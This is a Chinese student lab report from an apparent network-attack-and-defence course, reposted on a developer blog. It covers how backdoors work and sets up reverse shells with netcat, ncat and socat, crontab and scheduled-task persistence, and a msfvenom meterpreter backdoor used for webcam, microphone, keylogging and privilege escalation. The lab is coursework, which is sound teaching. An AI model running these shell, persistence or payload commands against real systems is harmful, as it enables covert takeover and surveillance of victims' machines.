热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

20145219《网络对抗》后门原理与实践

基础问题回答

  • 例举你能想到的一个后门进入到你系统中的可能方式?

    1、系统中可能本来就有开发者留的后门,虽然他们自己肯定是否认的,但我觉得他们说的不可信。

    2、平常我们会使用u盘、移动硬盘等来传输文件,但是我们的u盘、硬盘可能已经感染了病毒,在它们插到电脑上的时候就有可能让后门进入到系统中。

    3、我们经常会在网上下载一些破解版的安装包,这些安装包可能带有病毒,会将后门留在我们的系统中。

    4、无意中点进一些不安全的网页,可能会被放入后门。

  • 例举你知道的后门如何启动起来(win及linux)的方式?

    1、将后门伪装成看似正常的链接,我们被诱骗点击的时候就会启动。

    2、通过crontab设置后门定时启动,没到设置的时间点就会自己启动。

    3、新建一个任务,打开触发器,可以设置任务的触发时间。

  • Meterpreter有哪些给你映像深刻的功能?

    1、获取被入侵主机的权限,感觉有了这个就可以在别人不知道的情况下对他的电脑为所欲为了。

    2、控制对方的摄像头,想拍照还是拍视频都随你,时时刻刻都能监视对方。

    其实试的这几个功能都挺酷炫的,感觉是可以拿来拍个小视频在一下不学计算机相关专业的同学面前嘚瑟一下滴……但是吧,这些行为是不对的,我还是做个合法公民吧。

  • 如何发现自己有系统有没有被安装后门?

    1、打开杀毒软件杀一下毒。

    2、看看C:\WINDOWS\system32里有没有运行时间很可疑的文件。

实践过程记录

1、Win获取Linux shell

(1)Win在cmd.exe中使用ipconfig命令查看主机的IP。
20145219《网络对抗》后门原理与实践

(2)Win下载、解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5219命令运行ncat.exe监听5219端口。

(3)Linux在终端窗口使用nc Win的IP 端口 -e /bin/sh命令去连接Win的5219端口。
20145219《网络对抗》后门原理与实践

连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。
20145219《网络对抗》后门原理与实践

2、Linux获取Win shell

(1)Linux在终端中使用ifconfig命令查看自己的IP。
20145219《网络对抗》后门原理与实践

(2)Linux使用nc -l -p 5219命令监听5219端口。
20145219《网络对抗》后门原理与实践

(3)Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5219端口。

连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。
20145219《网络对抗》后门原理与实践

3、使用nc传输数据

(1)Win使用ncat.exe -l 5219命令监听5219端口。

(2)Linux在终端窗口使用nc Win的IP 端口命令去连接Win的5219端口。

(3)双向传输数据。
20145219《网络对抗》后门原理与实践

4、nc定时启动

(1)Win使用ncat.exe -l -p 5219命令运行ncat.exe监听5219端口。

(2)Linux使用crontab -e命令,在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh,在每个小时的这个分钟反向连接Windows主机的端口。
20145219《网络对抗》后门原理与实践

20145219《网络对抗》后门原理与实践

(3)58分时Win获得了Linux的shell,可以显示想要获取的东西。
20145219《网络对抗》后门原理与实践

5、尝试SoCat的功能

(1)在Win下,依次打开控制面板,管理工具,任务计划程序,然后选择创建一个新任务,填写好任务名称;新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口 exec:cmd.exe,pty,stderr
20145219《网络对抗》后门原理与实践

20145219《网络对抗》后门原理与实践

20145219《网络对抗》后门原理与实践

(2)锁定计算机,然后打开,刷新查看到新建的任务已经开始运行了。
20145219《网络对抗》后门原理与实践

(3)Linux下使用socat - tcp:Win的IP:端口命令,此时已经获取了Win的shell,可以查看想知道的东西。
20145219《网络对抗》后门原理与实践

6、MSF Meterpreter功能尝试

(1)Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20145219_backdoor.exe(20145219_backdoor.exe是会生成的后门文件的名字)命令生成后门。
20145219《网络对抗》后门原理与实践

(2)将后门传送到Win主机上(我传送到了ncat文件夹下)。
20145219《网络对抗》后门原理与实践

(3)Linux使用msfconsole命令进入控制台,并进行一系列payload、IP、端口的设置。
20145219《网络对抗》后门原理与实践

(4)Linux使用exploit命令开始监听,此时在Win上执行后门程序。
20145219《网络对抗》后门原理与实践

20145219《网络对抗》后门原理与实践

(5)Linux已经和Win连接好了,可以开始尝试不同的功能了。

录音功能:
20145219《网络对抗》后门原理与实践

拍照功能:
20145219《网络对抗》后门原理与实践

拍摄视频功能:
20145219《网络对抗》后门原理与实践

20145219《网络对抗》后门原理与实践

截屏功能:
20145219《网络对抗》后门原理与实践

记录击键功能:
20145219《网络对抗》后门原理与实践

提权:
20145219《网络对抗》后门原理与实践

实验总结与体会

本次实验实现我们小时候所以为的黑客们会做的事情:监控别人、翻看别人电脑里的资料、盗取别人的密码、控制别人的电脑等等很炫酷的事情。比较高兴的是感觉自己学会了一项看似很了不起的技能,以后可以拿去在小伙伴面前嘚瑟一下,享受一下别人崇拜的目光了。比较忧伤的是,原来自己的电脑这么不堪一击啊……我是和室友一起做实验的,有win7、win8、win10,win8和win10还好,攻击的时候都遇到了不同的麻烦,win7简直就是毫不设防,关了360之后别人想干什么就能干什么/(ㄒoㄒ)/~~

PS:感谢组长,我的虚拟机刚开始连不上网,我就借了他的电脑做,他帮我想办法联网,间或回答我各种各样的小问题,使我得以做完了实验。后来我们找到了联网方法,我就又在自己的电脑上做了一遍。


推荐阅读
  • Metasploit攻击渗透实践
    本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]
  • 本文介绍了在Win10上安装WinPythonHadoop的详细步骤,包括安装Python环境、安装JDK8、安装pyspark、安装Hadoop和Spark、设置环境变量、下载winutils.exe等。同时提醒注意Hadoop版本与pyspark版本的一致性,并建议重启电脑以确保安装成功。 ... [详细]
  • 如何实现JDK版本的切换功能,解决开发环境冲突问题
    本文介绍了在开发过程中遇到JDK版本冲突的情况,以及如何通过修改环境变量实现JDK版本的切换功能,解决开发环境冲突的问题。通过合理的切换环境,可以更好地进行项目开发。同时,提醒读者注意不仅限于1.7和1.8版本的转换,还要适应不同项目和个人开发习惯的需求。 ... [详细]
  • 本文介绍了如何在Azure应用服务实例上获取.NetCore 3.0+的支持。作者分享了自己在将代码升级为使用.NET Core 3.0时遇到的问题,并提供了解决方法。文章还介绍了在部署过程中使用Kudu构建的方法,并指出了可能出现的错误。此外,还介绍了开发者应用服务计划和免费产品应用服务计划在不同地区的运行情况。最后,文章指出了当前的.NET SDK不支持目标为.NET Core 3.0的问题,并提供了解决方案。 ... [详细]
  • 如何去除Win7快捷方式的箭头
    本文介绍了如何去除Win7快捷方式的箭头的方法,通过生成一个透明的ico图标并将其命名为Empty.ico,将图标复制到windows目录下,并导入注册表,即可去除箭头。这样做可以改善默认快捷方式的外观,提升桌面整洁度。 ... [详细]
  • 【Windows】实现微信双开或多开的方法及步骤详解
    本文介绍了在Windows系统下实现微信双开或多开的方法,通过安装微信电脑版、复制微信程序启动路径、修改文本文件为bat文件等步骤,实现同时登录两个或多个微信的效果。相比于使用虚拟机的方法,本方法更简单易行,适用于任何电脑,并且不会消耗过多系统资源。详细步骤和原理解释请参考本文内容。 ... [详细]
  • 本文介绍了在Windows环境下如何配置php+apache环境,包括下载php7和apache2.4、安装vc2015运行时环境、启动php7和apache2.4等步骤。希望对需要搭建php7环境的读者有一定的参考价值。摘要长度为169字。 ... [详细]
  • 本文介绍了如何使用C#制作Java+Mysql+Tomcat环境安装程序,实现一键式安装。通过将JDK、Mysql、Tomcat三者制作成一个安装包,解决了客户在安装软件时的复杂配置和繁琐问题,便于管理软件版本和系统集成。具体步骤包括配置JDK环境变量和安装Mysql服务,其中使用了MySQL Server 5.5社区版和my.ini文件。安装方法为通过命令行将目录转到mysql的bin目录下,执行mysqld --install MySQL5命令。 ... [详细]
  • 本文介绍了win7系统休眠功能无法启动和关闭的解决方法,包括在控制面板中启用休眠功能、设置系统休眠的时间、通过命令行定时休眠、手动进入休眠状态等方法。 ... [详细]
  • 解决github访问慢的问题的方法集锦
    本文总结了国内用户在访问github网站时可能遇到的加载慢的问题,并提供了解决方法,其中包括修改hosts文件来加速访问。 ... [详细]
  • 修复安装win10失败并提示“磁盘布局不受UEFI固件支持”的方法
    本文介绍了修复安装win10失败并提示“磁盘布局不受UEFI固件支持”的方法。首先解释了UEFI的概念和作用,然后提供了两种解决方法。第一种方法是在bios界面中将Boot Mode设置为Legacy Support,Boot Priority设置为Legacy First,并关闭UEFI。第二种方法是使用U盘启动盘进入PE系统,运行磁盘分区工具DiskGenius,将硬盘的分区表设置为gpt格式,并留出288MB的内存。最后,通过运行界面输入命令cmd来完成设置。 ... [详细]
  • 本文介绍了Composer依赖管理的重要性及使用方法。对于现代语言而言,包管理器是标配,而Composer作为PHP的包管理器,解决了PEAR的问题,并且使用简单,方便提交自己的包。文章还提到了使用Composer能够避免各种include的问题,避免命名空间冲突,并且能够方便地安装升级扩展包。 ... [详细]
  • 本文介绍了一种轻巧方便的工具——集算器,通过使用集算器可以将文本日志变成结构化数据,然后可以使用SQL式查询。集算器利用集算语言的优点,将日志内容结构化为数据表结构,SPL支持直接对结构化的文件进行SQL查询,不再需要安装配置第三方数据库软件。本文还详细介绍了具体的实施过程。 ... [详细]
  • DSP中cmd文件的命令文件组成及其作用
    本文介绍了DSP中cmd文件的命令文件的组成和作用,包括链接器配置文件的存放链接器配置信息、命令文件的组成、MEMORY和SECTIONS两个伪指令的使用、CMD分配ROM和RAM空间的目的以及MEMORY指定芯片的ROM和RAM大小和划分区间的方法。同时强调了根据不同芯片进行修改的必要性,以适应不同芯片的存储用户程序的需求。 ... [详细]
  • 使用C++编写程序实现增加或删除桌面的右键列表项
    本文介绍了使用C++编写程序实现增加或删除桌面的右键列表项的方法。首先通过操作注册表来实现增加或删除右键列表项的目的,然后使用管理注册表的函数来编写程序。文章详细介绍了使用的五种函数:RegCreateKey、RegSetValueEx、RegOpenKeyEx、RegDeleteKey和RegCloseKey,并给出了增加一项的函数写法。通过本文的方法,可以方便地自定义桌面的右键列表项。 ... [详细]
author-avatar
朱玉龙1977
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有